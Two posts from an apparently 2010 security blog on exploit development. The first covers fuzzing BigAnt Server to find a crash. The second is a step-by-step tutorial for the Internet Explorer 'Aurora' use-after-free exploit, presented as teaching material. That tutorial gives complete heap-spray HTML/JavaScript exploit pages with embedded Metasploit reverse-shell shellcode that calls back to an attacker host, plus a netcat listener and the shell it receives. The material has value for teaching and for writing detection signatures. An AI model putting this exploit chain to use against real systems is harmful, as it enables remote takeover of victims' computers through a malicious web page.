The Grey Corner

Introduction to Vulnerability Discovery: Guest Post

28 Jan 2010

When I wrote my second buffer overflow tutorial I mentioned that I was discussing with Lincoln the possibility of him writing a complementary blog post on how the vulnerability in BigAnt Server 2.52 was discovered. Well here is the post in its entirety, written by the man himself and posted as a guest entry on my blog:

Finding 0day for BigAnt

The process of finding a buffer overflow is sometimes tedious, sometimes exciting, and often involves a fair amount of luck. The best way to increase your chances of finding that "needle in a haystack", is to understand how your target application works. What processes does it run on? What inputs does it allow? These are the type of questions you want to ask yourself, to not only increase your chances of finding a buffer overflow, but to greatly reduce your time during your vulnerability discovery. Looking for software vulnerabilities can be done many ways like: fuzzing, source code analysis, and binary analysis just to name a few. This article will focus on the fuzzing technique used to discover the vulnerability triggered in BigAnt software that will lead us to a buffer overflow.

What is Fuzzing?

Wikipedia defines fuzzing as a software testing technique that provides invalid, unexpected, or random data to the inputs of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.

Before we begin to fuzz our target BigAnt Server for vulnerabilities, we need to understand how the program works. Understanding how the target works allows us to focus on what we believe, as the tester, will yield higher results than just blindly throwing random data. The first thing we want to do is identify what network port the Server/Client uses to communicate. A quick inspection would tell us that the server uses port 6660 to listen for an incoming TCP connection from our client. How do we know what port the client connects to the sever? Where did you get port 6660?

This can be done a few ways. The simplest would be to notice when we install the server, the QuickStart Guide asks us to put in our "Company Name:" and also select the "Port:" to use for our server (which defaults to 6660).

If you're like me and you just click next a bunch of times quickly when installing software, you might of missed that detail! The other way would be to look at the server options in the general settings tab, or to go to the advanced settings tab and click on the service manager button. Generally speaking (not always), network software will allow the user to specify what port the application works on, in case the user already has existing software running on that port. This will be in the initial setup, or somewhere in the program that allows us to configure that option.

The other way of finding out what port the client connects to the server would be to simply capture a TCP dump.

To do this we will need to set up two test machines or setup one machine (for both the client and software). If you use one test machine, you will have to setup the loopback interface to in your sniffer to capture data. The option to use one or two systems to setup the capture is up to the user and their resources. If you are not familiar with capturing data, or using a sniffer, the two system setup might be easier for you. The rest of the demonstration is based on using two machines.

We will begin by setting up our server on one machine, and adding a user to the database. For the demonstration, a user named test and the password set as test was created. This will allow us to login from our client machine to the server and monitor the authentication and connection stage.

After our user is created on the server, we will go ahead and install the client application on our other machine.

Before connecting to the server, we will want to monitor the packets being sent back and forth. This will provide us with intelligent fuzz variables to put in our fuzzer. To do this, we can use Wireshark on either the client or server to capture the packets and analyze the traffic. Wireshark comes pre-installed if you are using BackTrack, simply type in Wireshark at the console. Please note if you opt to use Wireshark in BackTrack to capture traffic between the server and client, the network interface in BackTrack must be on the same subnet.

Once the client connects to the server, we can view the TCP dump in Wireshark by selecting a packet with a destination to our server/port and clicking the analyze drop down menu and then selecting 'Follow TCP Stream'. This will allow us to examine the packets in detail exchanged during the authentication stage.

We can see that there appears to be four steps that the client uses to authenticate with the server.

1. First the client sends over "USR L ATEN" followed by the login and password. The server replies back with an OK and assigns the client an ID tag that is used with the next stage in authentication.
2. Next the client sends another packet with "USV" followed by the login, and then the ID tag assigned by the server in the previous packet. The server acknowledges with a reply.
3. The client then sends over a "LSV" packet with additional variables. The server acknowledges.
4. Lastly the client sends over "NEG 4 2 My%20contacts" which is the contacts in the client application, and the server acknowledges.

There's one thing to point out before we go any further. Only the headers of each packet, (ex: USR, USV, LSV, NEG) were used for fuzz testing for this demonstration. It would be equally as important to fuzz the other fields in the packets (such as: aenflag, clientver:, cmdid, etc). Those fields might yield results as well, and should not be dismissed.

Using the above fields, we are going to create a fuzzer that will send over our modified packets with those headers, appended by long strings of data. To do this we first need to build our fuzzer.

Simple Fuzzer by Aaron Conole is a very easy and robust fuzzer that will allow us to fuzz our application. The application can be downloaded from that site and installed on our attacking machine. There is also a video on Security Tube by Vivek Ramachandran demonstrating how this fuzzer works, as well as a couple examples.

We will go ahead and input our 4 fuzz variables into our fuzzer configuration file named ant.cfg.

The configuration file will send a long sequence of A characters to our server. The next two commands determine the sequence step and max sequence length. The configuration file specifies to send over our A character in 900 byte steps until it reaches a total of 4500. The fuzzed data being sent over will look like:

Start with top command

"command " + "A" * 900
"command " + "A" * 1800
"command " + "A" * 2700
"command " + "A" * 3600
"command " + "A" * 4500

Stop
Repeat next command until program finishes or the application no longer responds

For this demonstration, the picture above only shows the USV string being fuzzed, since that is the command that leads to our buffer overflow. If you skipped watching the video on Security Tube about Simple Fuzzer, and are wondering how to start the application, the command line syntax is:

./sfuzz -TO -f sfuzz-sample/ant.cfg -S 10.0.0.27 -p 6660

Monitoring the crash can be done several ways. The easiest is to see the last packet the server accepted with Wireshark. Since our goal is to send malformed packets to our server and crash the application, the port will then close when it reaches our specially crafted USV packet of more than 1000 "A" characters. It's a good idea to re-test this a few times to confirm that indeed our USV packet causes the crash, and then the next step would be to attach a debugger.

To reaffirm that the USV packet crashes the application, we can attach a debugger like Ollydbg and rerun our fuzzer to confirm that we have indeed found a crash that could potentially lead to a buffer overflow exploit. Now to continue onto Lupin's SEH Stack Based Windows Buffer Overflow for a very in-depth and detailed look on creating a buffer overflow exploit with this server.

One last thing I would like to comment is that while everything looked very cut and dry, fuzzing can take a lot of time, and often doesn't yield the results above. Not all programs are exploitable, and contain improper bounds checks such as the USV field in BigAnt Server. This issue has been corrected, and a vendor patch can be applied to prevent this attack.

References:
http://en.wikipedia.org/wiki/Fuzzing
http://wiki.wireshark.org/CaptureSetup/Loopback
http://www.wireshark.org/
http://www.backtrack-linux.org/
http://aconole.brad-x.com/programs/sfuzz.html
http://securitytube.net/Sfuzz-Fuzzer-Demo-video.aspx
http://www.ollydbg.de/
/2010/01/seh-stack-based-windows-buffer-overflow.html

Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability

24 Jan 2010

Introduction

This is the fourth entry in my series of exploit tutorials. Part one is here, part two is here, and part three is here. The tutorials are written to be done in order, so ensure you have the required knowledge from parts one through three before you attempt number four.

In this entry, we will be reproducing the "aurora" Internet Explorer exploit using heap spraying. This exploit takes advantage of a use after free vulnerability that is present in multiple versions of Internet Explorer on multiple versions of Windows. Unlike those discussed in my previous tutorials, this vulnerability does not involve a buffer overflow, and instead makes use of heap corruption that occurs when an object's memory space on the heap is accessed after being first freed and then overwritten. Despite the fact that this exploit is not a traditional buffer overflow, the techniques used are similar enough for me to include this tutorial in this series.

This vulnerability was originally discovered in the wild, and was used as part of the well publicised attack on Google that was (allegedly) performed by the Chinese. A patch is now available from Microsoft for this vulnerability and you can see their advisory on the issue here.

This is also the first time I have demonstrated a client side exploit in one of my tutorials - all previous tutorials have involved attacks on servers. While server exploits used to be all the rage, over the last 6 years or so client side attacks have become more and more prevalent as server based protection has gotten better and better. The benefit of the client side exploit is that it allows the attacker to focus their efforts on a system which is usually less well protected than a server and which (in an Enterprise environment) usually has full unrestricted access to other internal systems, including servers.

Triggering the client side exploit usually involves the attacker enticing the user of the victim client system into visiting a malicious web site or opening a malicious document. This can be achieved by including a link or an attachment in an email, or hacking legitimate sites and adding code to redirect traffic to the malicious web page. When used in the wild, the client side exploit will usually contain a payload which is configured to download a piece of malware from the Internet and run it on the client system.

In this tutorial I will be hosting the malicious files on a web server running on my attacking system and I will access my malicious web site from my victim system.

My particular version of the exploit that I reproduce below is based on the original exploit from the wild as well as the code produced by the Metasploit module.

Note: For a number of reasons, the exploit for this vulnerability can be a little unreliable, both in terms of reproducing the crash and taking control of the crash using heap spraying. This is due to the difficulty of structuring the heap correctly so that the conditions for the exploit to work are in place. So if things don't work the first time, repeat what you have done once or twice more before double checking to see if you have made a mistake in your code. My experience with this exploit is that it does work more often than it doesn't, but it definitely does not work all of the time.

Warning! Please note that this tutorial is intended for educational purposes only, and you should NOT use the skills you gain here to attack any system for which you don't have permission to access. It's illegal in most jurisdictions to access a computer system without authorisation, and if you do it and get caught (which is likely) you deserve whatever you have coming to you. Don't say you haven't been warned.

EDIT: For those who like videos with their tutorials, Lincoln produced a video based on this blog post which you can find here.

Required Knowledge

To follow this tutorial you will need to have basic knowledge of:

TCP/IP networking,
management of the Windows Operating System (including installing software, running and restarting services, connecting to remote desktop sessions, etc), and
HTML and JavaScript.

You need to have good enough knowledge of the attacking system you use (whether it be BackTrack, another type of Linux, Windows or anything else) to be able to run programs and scripts as well as transfer files.

Knowledge of basic debugger usage with OllyDbg, including the ability to start and attach to programs, insert breakpoints, step through code, etc, is expected. This is covered in my first tutorial.

While you should be able to get by with only basic knowledge of how to read HTML and Javascript, some programming experience in these languages would be a bonus.

System Setup

In order to reproduce this exploit for the tutorial, I used a victim system running Windows XP SP2, and a attacking system running BackTrack 4 Final.

You don't need to reproduce my setup exactly, but I would suggest sticking to Windows XP SP2 or earlier for the victim system, especially for this particular exploit. The attacking system can be anything you feel comfortable in, as long as it can run the software I have specified below, and as long as you are able to translate the Linux commands I will be listing below into something appropriate for your chosen system.

If required, you can get a XP SP2 Virtual Machine to use as your victim by following the instructions in the Metasploit Unleashed course, starting in the section "02 Required Materials" - "Windows XP SP2" up to the section entitled "XP SP2 Post Install".

Your victim system must also use a X86 based processor.

In this tutorial my attacking and victim systems use the following IP Addresses. You will need to substitute the addresses of your own systems where ever these addresses appear in the code or commands listed below.

Attacker system: 192.168.20.11
Victim system: 192.168.10.27

The two systems are networked together and I have interactive GUI access to the desktop of the victim system via a remote desktop session. You will need to be able to easily and quickly switch between controlling your attacking system and the victim system when following this tutorial, so make sure you have things set up appropriately before you proceed.

Required Software on Attacking and Victim Systems

Your attacker and victim systems will need the following software installed in order to follow this tutorial. By using BackTrack 4 Final for your attacking system you will take care of all of the attacking system prerequisitites.

The attacking system requires the following software:

Metasploit 3.x
Text Editor
Netcat

The victim system requires the following software:

Internet Explorer 6. I am using the default unpatched version that is provided in XP SP2.
OllyDbg 1.10

Ensure that all required software is installed and operational before you proceed with this tutorial.

Triggering the Exploitable Crash

As mentioned in the Introduction, this exploit takes advantage of a user after free vulnerability in Internet Explorer. The code required to actually cause the exploitable crash is a little more complicated than that included in some of the previous tutorials I have written, so I have provided below a summary description of what the code does, and have also listed a number of comments in the code below.

Heres the code:

<html>
<script>

// Create ~ 200 comments using the randomly selected three character string AAA, will change data later in an attempt to overwrite
var Array1 = new Array();
for (i = 0; i < 200; i++)
{
Array1[i] = document.createElement("COMMENT");
Array1[i].data = "AAA";
}

var Element1 = null;

// Function is called by the onload event of the IMG tag below
// Creates and deletes object, calls the function to overwrite memory
function FRemove(Value1)
{
Element1 = document.createEventObject(Value1); // Create the object of the IMG tag
document.getElementById("SpanID").innerHTML = ""; // Set parent object to null to trigger heap free()
window.setInterval(FOverwrite, 50); // Call the overwrite function every 50 ms
}

// Function attempts to overwrite heap memory of deleted object and then access object to trigger crash
function FOverwrite()
{
buffer = "\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA";
for (i = 0; i < Array1.length; i++)
{
Array1[i].data = buffer; // Set comment data to buffer, try to overwrite heap memory of deleted object
}
var a = Element1.srcElement; // Access the pointer to the deleted object, trigger crash
}

</script>

<body>
<span id="SpanID"><IMG src="/abcd.gif" onload="FRemove(event)" /></span></body></html>
</body>
</html>

And here is an explanation of what the code does.

The HTML document above contains some basic HTML code, as well as a JavaScript script, with some main code and a couple of functions.

When the document is loaded in a browser the script will run first and will create a number of COMMENT elements in the document, all set to the value "AAA" (this can set set to another random three character string if you wish). These values are all stored on the heap. The rest of the script contains functions which will be run individually a bit later on during the loading of this page in the browser.

The HTML code at the bottom of the document is parsed next, and a HTML span object that includes a child IMG tag is created. The IMG tag retrieves an image from the web server (/abcd.gif in this case) and when it loads in the browser the FRemove function is called, with a reference to the IMG tag passed as a parameter.

The FRemove function creates the Element1 object using the IMG tag as a parameter, deletes the parent SpanID object, and calls the FOverwrite function, which it will rerun every 50ms. This is the "free" part of the use after free vulnerability, we have freed the heap memory owned by the Element1 object when we set the SpanID object to a null value.

The FOverwrite function then changes the data of the COMMENT elements created earlier, in an attempt to overwrite the heap memory location associated with the Element1 object. After all of the 200 COMMENT values are changed, we try to access the Element1 object by assigning a property of the object to the "a" variable, and if the heap memory of this object has been correctly overwritten, we should now get an exception. This is the "use" part of the use after free vulnerability.

To run this on my victim system, I am writing the code above into a HTML file aurora.html, copying that file to my web server's root directory and starting my web server. Don't forget that the image file abcd.gif must also exist in the /var/www/ web server directory for this exploit to work.

root@bt:~# cp aurora.html /var/www/
root@bt:~# /etc/init.d/apache2 start

I then open Internet Explorer, attach to it in my debugger and access the file from my attacking system at 192.168.20.11.

After a short wait we should have an exception triggered in our debugger.

The exception we should see is an access violation trying to read AAAAAAAA, which is the value that should be stored in the ECX register. (If this doesn't happen for you take note of what I said about the unreliability of this exploit in the Introduction..)

Details about the exception

So what precisely is happening at the time of this exception? If we look at the instructions being executed by the CPU at the time of the crash inside the mshtml module, we see the following:

7D4F2531 8B01 MOV EAX,DWORD PTR DS:[ECX]
7D4F2533 FF50 34 CALL DWORD PTR DS:[EAX+34]

The first instruction, MOV EAX,DWORD PTR DS:[ECX] is attempting to move a DWORD sized section of memory, located at the address pointed to by the ECX register, into the EAX register. In other words, the system is taking the value of ECX, which is AAAAAAAA, and trying to read 4 bytes of memory from this memory address to copy to register EAX. Since AAAAAAAA is not a valid address in memory, we get an access violation trying to read this address, and the program stops in the debugger. If the register ECX did contain a valid memory address, such as 0013E174, then four bytes of data stored at this memory address would be used to set the value of EAX.

So if we set the value of ECX to a valid memory address, we could control the value of EAX, but what good does setting the value of EAX do exactly? Well, if you look at the next instruction, it is attempting to CALL a function located at the memory location pointed to by the EAX register plus 0x34. So if we can set EAX such that the value of EAX plus 0x34 points to a location of memory that we control, and this area contains some shellcode we have provided, then we have the ability to execute code of our choice.

This may seem like a lot to ask at first. We need to:

Copy our shellcode into memory,
Know the starting address of the shellcode so we can copy it to memory somewhere. This is the address that is accessed by the pointer to EAX + 0x34.
Know the address that the previous address is stored in memory, so we can subtract 0x34 from it and then store that in memory. This is the address that ends up in EAX, accessed by a pointer from ECX.
Know the address that the previous address is stored in memory, so we can send it in our free-heap-entry-overwriting buffer to overwrite ECX.

That's three addresses in memory that we need to know, and while we might be able to find known locations in memory where the pointer addresses are already stored, similar to the way in which we found overwrite instructions in memory in the other tutorials, determining a reliable location in memory for our shellcode could be difficult.

This is where heap spraying comes in.

Heap Spraying

As the name suggests, heap spraying essentially involves "spraying" the heap with a large amount of data, including some tacked on shellcode. The eventual aim of placing all of this data onto the heap is to create the right conditions in memory to allow the shellcode to be executed when an exploitable crash is triggered in a process.

The technique of heap spraying has been around for a number of years and was initially only used in browser exploits. Recently however, use of the technique has branched out into other areas, being used in PDF and Flash based exploits.

Heap spraying is usually chosen when other more straightforward and effective exploitation techniques cannot be used. This is because the method can be unreliable, and the amount of data that is generated in the memory of the target application can cause a noticable slowdown, which is significiant because the technique is usually used in client applications which could be closed by a user if they believe the application has stopped responding.

Heap spraying is usable in any situation where the attacker can cause the victim process to allocate large blocks of data onto the heap. It is typically achieved via the use of scripting languages integrated in the vulnerable program. This allows the attacker to send code to the victim that generates the appropriate data on the heap, relieving the attacker of the burden of having to manually send the data to the client in another way. Considering the amount of data that is required in heap spraying (easily into multiple megabytes), using victim-side code to generate the data is often the only practical way to achieve this goal. Heap spraying code is usually writen in Javascript (where it can run in Internet Explorer, Firefox, Acrobat Reader, etc) but has also been seen in ActionScript (Flash) and VBScript (Internet Explorer).

The particular data that is used to spray the heap depends on the vulnerability being exploited. For this exploit, we will be spraying the heap with the value \x0C0D, and we will also modify our buffer that fills the free section of heap memory to also use this value. This will result in ECX being overwritten with 0C0D0C0D. I will explain the signficance of this value in a moment, however lets first look at the heap spraying code we will use.

The heap spray code below is slightly modified from the Metasploit code for this vulnerability. It essentially creates strings of around 870400 bytes in length, comprised of the characters "0c0d" with the shellcode we have provided appended to the end. An array in memory is then filled with around 100 of these strings. This generates around 83 MB of data on the heap.

function HeapSpray()
{
Array2 = new Array();
var Shellcode = unescape( '%ucccc%ucccc');
var SprayValue = unescape('%u0c0d');
do { SprayValue += SprayValue } while( SprayValue.length < 870400 );
for (j = 0; j < 100; j++) Array2[j] = SprayValue + Shellcode;
}

I have included some shellcode of \xcc\xcc\xcc\xcc. This is essentially just four breakpoint values so execution will pause in the debugger once the shellcode is hit. This will allow us to see what is happening inside the browser process at the time of shellcode execution, so we can see what we have achieved by the heap spray.

I arrived at the values in my heap spray code (870400 and 100) via trial and error after seeking to find a balance between the reliability of the exploit and the amount of data generated on the heap. Make the values too large and the page will take too long to load and you risk the user killing the browser process thinking it has stopped responding. Make the values too small and you won't achieve the correct memory coverage on the heap and the exploit will fail. Feel free to try increasing and decreasing these values to see how it impacts the reliability of the exploit.

When using a heap spray method, we also want to be sure that we include the heap spray code into our exploit before the code that triggers the use after free exception, so that the heap will be ready when the exception occurs.

Lets now add this to our exploit. Make sure you include the call to HeapSpray in the FRemove() function. See the example code below.

<html>
<script>

var Array1 = new Array();
for (i = 0; i < 200; i++)
{
Array1[i] = document.createElement("COMMENT");
Array1[i].data = "AAA";
}

var Element1 = null;

function HeapSpray()
{
Array2 = new Array();
var Shellcode = unescape( '%ucccc%ucccc');
var SprayValue = unescape('%u0c0d');
do { SprayValue += SprayValue } while( SprayValue.length < 870400 );
for (j = 0; j < 100; j++) Array2[j] = SprayValue + Shellcode;
}

function FRemove(Value1)
{
HeapSpray();
Element1 = document.createEventObject(Value1);
document.getElementById("SpanID").innerHTML = "";
window.setInterval(FOverwrite, 50);
}

function FOverwrite()
{
buffer = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i < Array1.length; i++)
{
Array1[i].data = buffer;
}
var t = Element1.srcElement;
}

</script>

<body>
<span id="SpanID"><IMG src="/abcd.gif" onload="FRemove(event)" /></span></body></html>
</body>
</html>

Now lets open this page into Internet Explorer with our debugger attached, and see what happens.

My debugger pauses execution at the second of the breakpoint characters I sent in my shellcode.

If this doesnt happen for you, try, try again! If its still not happening after the third or fourth attempt, try increasing the array loop value upwards from 100.

The Heap Spray in Action

So we reached our shellcode and have control of code execution, but how did this work?

Well, lets go back and look at the two commands that were being executed in module mshtml at the time of our initial crash.

7D4F2531 8B01 MOV EAX,DWORD PTR DS:[ECX]
7D4F2533 FF50 34 CALL DWORD PTR DS:[EAX+34]

The first command MOV EAX,DWORD PTR DS:[ECX] sets EAX from a DWORD sized block of memory located at an address pointed to by the ECX register.

If we check our ECX register in the debugger, it is set to 0C0D0C0D.

This part should not come as too much of a surprise to you, we sent this value to the program via the buffer variable in the FOverflow function.

Now if we follow the ECX register into our memory dump (Right click on register, select Follow in Dump) and check the four byte value we see in this location, it should be 0C0D0C0D, and it should be sitting within a large section of memory with the same repeating value. This particular value, 0C0D0C0D, should have been used to set our EAX register, which should have resulted in EAX having a value of 0D0C0D0C (because the little endian x86 processor changes the order of the bytes putting the least significant byte first).

If we now check the value of EAX in our debugger, we see it is set to 0D0C0DCD.

This is not the value we expected, so it seems as though something has happened to this value since it was set. It is fairly close to what it should be though, and we did reach our shellcode, so let's assume for the moment that the value of EAX has been set from our heap sprayed data. We will examine exactly what happened to the EAX register a little later.

The next command from mshtml from the period of the crash is CALL DWORD PTR DS:[EAX+34]. To examine what this will do, lets take the value that EAX should have been set to 0D0C0DCD, add 0x34 to give us 0D0C0D40 and then scroll to this location in the memory dump.

The contents of memory at this offset is 0D0C0D0C. The CALL instruction would have set EIP to 0C0D0C0D (little endian ordering again) and the data stored in memory at this location would have been interpreted as code and run in the CPU. So our heap spray has also enabled us to take control of EIP and code execution.

Given that the starting address of EIP should have been 0C0D0C0D, how come our current value of EIP is 0C2C0026?

Obviously something has happened between this CALL command which should have redirected execution to 0C0D0C0D and us hitting the breakpoint at the start of our shellcode at 0C2C0026. We can check what this is by selecting the four bytes of memory located at 0D0C0D40 in the memory dump, right clicking and selecting Follow DWORD in Dump.

This will take us to 0C0D0C0D in the memory dump, and we can then view the contents of memory as assembly instructions by right clicking and selecting Disassemble. (To get it back to the previous default view select Hex->Hex/ASCII(8 bytes)).

You can also view these instruction in the CPU pane, by right clicking in the CPU pane, selecting Go to->Expression and entering the address 0C0D0C0D followed by hitting OK.

You should now be seeing a large number of OR AL, 0D instructions.

This command performs a OR operation on the AL register (which is the lower byte of the AX register, which itself is the lower two bytes of the EAX register) using the value 0x0D. Given a value for EAX of 0D0C0D0C, this will perform an OR operation on the lower byte (0C), which will have the effect of setting the value of the last byte of EAX to 0D, and the value of EAX to 0D0C0D0D. Subsequent repetitions of this command will leave the value of EAX unchanged at 0D0C0D0D. But why was EAX set to 0D0C0DCD when we hit the start of our shellcode?

Well if you view the start of our shellcode in the CPU pane (double click on the EIP register to jump there), and check above the first INT3 instruction you will see a single OR AL,0CC instruction, sitting below a long section of OR AL,0D commands.

The hexadecimal representation of this assembly instruction is \x0C \xCC, so in this case the first of the CC breakpoint characters we set in our shellcode has actually been joined to one of the 0C characters from our heap spray pattern and interpreted as a command by the CPU. This final command is what transformed the value of EAX to 0D0C0DCD. This joining together of heap spray data and shellcode leading characters is behaviour we need to be aware of so we can work around it when we finally add our payload providing shellcode.

The important point to realise here is that the instruction OR AL, 0D essentially acts as a NOP like instruction, allowing us to use a large number of these instructions as a NOP sled. We can land execution of the CPU anywhere within this NOP Sled, and it will happily cycle through each instruction, not doing anything that causes a crash or significantly changes the state of CPU execution, until we eventually land at our shellcode at the end of the sled.

The OR AL, 0D instruction resulted from 0C being used as the first byte in this instruction (the assembly interpretation of \x0C0D is OR AL, 0D). This particular interpretation of the data from our heap spray occurred because the CALL DWORD PTR DS:[EAX+34] instruction from msthtml resulted in us landing on a 0C character first. If we had happened to load on a 0D character first instead, we would have ended up with the assembly command OR EAX,0D0C0D0C. As it turns out, this will work equally well as a NOP like instruction, because it only performs operations on the value of EAX.

So as it turns out, the value of 0C0D has a number of characteristics that make it perfect for this particular heap spray exploitation technique:

The addresses that can be made up of repeating 0C0D characters (0C0D0C0D and 0D0C0D0C) reside on the heap. In addition, if we fill the memory around those addresses with these same characters, the machine code run at the time of the use-after-free error will eventually redirect CPU execution to this general area in memory.
The machine language instructions that are comprised of repeating 0C0D characters ("OR AL, 0D" and "OR EAX,0D0C0D0C") can act as NOP equivalent instructions to form a NOP sled. This allows us to land within this general area on the heap and run through to our shellcode.

Our goal when we perform this heap spraying then, is to fill the area on the heap between the addresses of 0C0D0C0D and 0D0C0D40 (0D0C0D0C + 0x34) with repeating 0C0D bytes, so we can gain control of execution. The difficulty of assuring that the heap memory gets allocated in this manner is part of what makes this exploitation method a little unreliable.

Adding Shellcode

Now that we know we can redirect execution to the location of our shellcode in memory, we can add some proper shellcode to our exploit.

Lets generate some reverse shell shellcode in Metasploit and output it in JavaScript format (J).

user@bt:~$ msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 J
// windows/shell_reverse_tcp - 314 bytes
// http://www.metasploit.com
// LHOST=192.168.20.11, LPORT=443, ReverseConnectRetries=5,
// EXITFUNC=process
%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f
%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10
%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49
%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275
%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b
%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854
%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050
%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%ua8c0%u0b14%u0268%u0100%u89bb%u6ae6
%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659
%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656
%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0
%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300
%ud5ff

I am also going to throw 4 NOP characters onto the front of my shellcode. This is to deal with the issue where the first character of the shellcode is subsumed into a machine code instruction with the last of the heap spray charaters (remember the OR AL, CC instruction?). One NOP would really be enough, but using multiple NOPs here will also deal with any cases where the CALL instruction ends up landing on an 0D value, in which case the CPU will interpret the 0D0D bytes as OR EAX instructions. This would result in up to three of the characters from our shellcode being subsumed into an instruction with our heap spray characters (e.g. the data \x0D\x0C\x90\x90\x90 will result in the instruction OR EAX,9090900C).

Here is the finished code:

<html>
<script>

var Array1 = new Array();
for (i = 0; i < 200; i++)
{
Array1[i] = document.createElement("COMMENT");
Array1[i].data = "AAA";
}

var Element1 = null;

function HeapSpray()
{
Array2 = new Array();
// msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 J
var Shellcode = unescape( '%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%ua8c0%u0b14%u0268%u0100%u89bb%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff');
var SprayValue = unescape('%u0c0d');
do { SprayValue += SprayValue } while( SprayValue.length < 870400 );
for (j = 0; j < 100; j++) Array2[j] = SprayValue + Shellcode;
}

function FRemove(Value1)
{
HeapSpray();
Element1 = document.createEventObject(Value1);
document.getElementById("SpanID").innerHTML = "";
window.setInterval(FOverwrite, 50);
}

function FOverwrite()
{
buffer = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i < Array1.length; i++)
{
Array1[i].data = buffer;
}
var t = Element1.srcElement;
}

</script>

<body>
<span id="SpanID"><IMG src="/abcd.gif" onload="FRemove(event)" /></span></body></html>
</body>
</html>

Lets start a listener on our attacking system:

root@bt:~# nc -nvvlp 443
listening on [any] 443 ...

And open the exploit in our browser

root@bt:~# nc -nvvlp 443
listening on [any] 443 ...
connect to [192.168.20.11] from (UNKNOWN) [192.168.10.27] 1471
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User\Desktop>

W00t! We have shell.

A Note About Obfuscation

If you are reading tutorial as a guide in order to develop some sort of filter pattern or IDS/IPS signature for this particular exploit (and part of the reason I started writing this series was to educate people on how exploits worked so they could do this), at this point I should probably make you aware of how the code for this, and similar exploits can be obfuscated.

My particular version of this exploit has been written to be as readable and easy to understand as possible, using (hopefully) clear variable names, easily readable layout and structure and no other obfuscation. If you check out the original exploit, or the Metasploit equivalent, you will see that strings have been mangled, variable names changed to the incomprehensible, data has been randomised and code has been obfuscated.

The original exploit code you see at Wepawet for example has already had one layer of obfuscation removed (a good dissection of this is here), and even after one layer of decoding it is still hiding it's heap spray code inside the sss variable.

